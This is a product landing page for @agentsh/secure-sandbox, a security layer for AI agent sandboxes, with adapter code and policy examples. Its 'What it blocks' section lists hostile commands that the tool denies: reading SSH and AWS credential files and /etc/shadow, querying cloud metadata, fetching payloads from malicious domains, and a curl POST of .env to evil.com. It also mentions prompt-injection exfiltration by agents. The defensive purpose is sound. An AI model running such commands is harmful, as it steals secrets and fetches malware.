What sandbox platforms does @agentsh/secure-sandbox support?

@agentsh/secure-sandbox supports Vercel Sandbox, E2B Sandbox, Daytona Sandbox, Cloudflare Containers, Blaxel Sandbox, and Sprites (Fly.io Firecracker microVMs). Each platform has a built-in adapter that wraps the sandbox with kernel-level security enforcement including seccomp, Landlock, FUSE, network proxy filtering, and Data Loss Prevention.

How does @agentsh/secure-sandbox protect AI agent sandboxes?

@agentsh/secure-sandbox uses multiple kernel-level enforcement layers: seccomp blocks dangerous syscalls like sudo and privilege escalation, Landlock restricts filesystem access to prevent credential theft from .ssh and .aws directories, FUSE provides a virtual filesystem layer for file operation interception, a network proxy filters outbound connections by domain and port, and DLP detects and redacts secrets in command output. All enforcement is deterministic and operates below the AI model layer.

How do I customize security policies in @agentsh/secure-sandbox?

@agentsh/secure-sandbox provides four preset policies (agentDefault, devSafe, ciStrict, agentSandbox) that can be extended in TypeScript. You can allow specific API domains, open file paths, restrict ports, and configure threat intelligence feeds — all as code. Import a preset and pass override rules for network, file, and command access.

Your AI sandbox has no security layer.
This adds one.

Name: @agentsh/secure-sandbox
Author: Canyon Road

AI agents run arbitrary code in your sandbox. Without enforcement at the OS level, a single prompt injection can exfiltrate credentials, access cloud metadata, or pivot to internal services.

Drop-in runtime security for Vercel, E2B, Daytona, Cloudflare, Blaxel, and Sprites sandboxes. One npm install, three lines of TypeScript.

$ npm install @agentsh/secure-sandbox copy

index.ts

import { Sandbox } from '@vercel/sandbox';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Sandbox.create({ runtime: 'node24' });
const sandbox = await secureSandbox(adapters.vercel(raw));

await sandbox.exec('npm install express');  // allowed
await sandbox.exec('cat ~/.ssh/id_rsa');   // blocked
import Sandbox from '@e2b/code-interpreter';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Sandbox.create();
const sandbox = await secureSandbox(adapters.e2b(raw));

await sandbox.exec('pip install pandas');    // allowed
await sandbox.exec('cat ~/.aws/credentials'); // blocked
import { Daytona } from '@daytonaio/sdk';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await new Daytona().create();
const sandbox = await secureSandbox(adapters.daytona(raw));

await sandbox.exec('node server.js');        // allowed
await sandbox.exec('curl http://169.254.169.254/'); // blocked
import { Container } from '@cloudflare/containers';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Container.create();
const sandbox = await secureSandbox(adapters.cloudflare(raw));

await sandbox.exec('npm run build');          // allowed
await sandbox.exec('sudo apt install nmap');  // blocked
import { SandboxInstance } from '@blaxel/sandbox';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await SandboxInstance.create();
const sandbox = await secureSandbox(adapters.blaxel(raw));

await sandbox.exec('python train.py');       // allowed
await sandbox.exec('env | grep SECRET');    // blocked
import { Sprite } from '@fly/sprites';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Sprite.create();
const sandbox = await secureSandbox(adapters.sprites(raw));

await sandbox.exec('cargo build --release');  // allowed
await sandbox.exec('cat /etc/shadow');          // blocked

Vercel Sandbox E2B Sandbox Daytona Sandbox Cloudflare Containers Blaxel Sandbox Sprites (Fly.io)

What it blocks

Every command runs through the policy engine. Dangerous operations are denied before they reach the kernel.

Credential Theft

$ cat ~/.ssh/id_rsa

denied: file policy blocks /home/*/.ssh/**

$ cat ~/.aws/credentials

denied: file policy blocks /home/*/.aws/**

Malicious Domains

$ curl https://afrfrancedns.com/payload.sh

denied: blocked by URLhaus threat feed

$ wget http://login-microsft-verify.com/steal

denied: blocked by Phishing.Database

Supply Chain Attacks

$ npm install colourama

blocked: typosquat detected (did you mean colorama?)

$ npm install event-stream@3.3.6

blocked: critical vulnerability (CVE-2018-16396)

Data Exfiltration

$ curl -X POST https://evil.com -d @.env

denied: domain not on allowlist + DLP redacted secrets

$ curl http://169.254.169.254/latest/meta-data/

denied: metadata endpoints blocked

Privilege Escalation

$ sudo apt install nmap

denied: seccomp blocks sudo

$ env | grep SECRET

denied: env policy hides sensitive variables

Safe Operations

$ npm install express

ok: registry.npmjs.org is on the allowlist

$ cat /workspace/src/app.ts

ok: workspace files are readable

How it works

Built on agentsh, the open-source execution-layer security engine. A lightweight Go binary replaces /bin/bash inside the sandbox, routing every operation through kernel-level enforcement before it reaches the host.

Enforcement is synchronous and adds <1ms per command. No background daemons, no network round-trips.

Policy as code

Extend any preset with your own rules. Allow specific APIs, open file paths, restrict ports — all in TypeScript. See the policy docs →

policy.ts

import { agentDefault } from '@agentsh/secure-sandbox/policies';

const policy = agentDefault({
  network: [
    { allow: ['api.stripe.com', 'api.openai.com'], ports: [443] }
  ],
  file: [
    { allow: '/data/**', ops: ['read', 'write'] }
  ],
});

const sandbox = await secureSandbox(adapters.e2b(raw), { policy });

agentDefault

Production AI agents. Allowlists registries, blocks credential files, restricts dangerous commands.

devSafe

Local development. Permissive network, workspace-focused file access.

ciStrict

CI/CD runners. Workspace-only access, restricted registries and commands.

agentSandbox

Untrusted code. No network, read-only workspace, heavily restricted.

Supported sandbox platforms

Built-in adapters for the major hosted AI sandbox providers. Each adapter maps the platform's SDK to the secure-sandbox interface with zero configuration.

Vercel Sandbox — seccomp, Landlock, network proxy, DLP
E2B Sandbox — seccomp, Landlock, FUSE, network proxy, DLP
Daytona Sandbox — seccomp, Landlock, FUSE, network proxy, DLP
Cloudflare Containers — seccomp, Landlock, network proxy, DLP
Blaxel Sandbox — seccomp, Landlock, FUSE, network proxy, DLP
Sprites (Fly.io) — seccomp, Landlock, FUSE, network proxy, DLP (Firecracker microVMs)

One dependency. Three lines. Kernel-level protection.

Stop hoping your sandbox is safe. Know it is.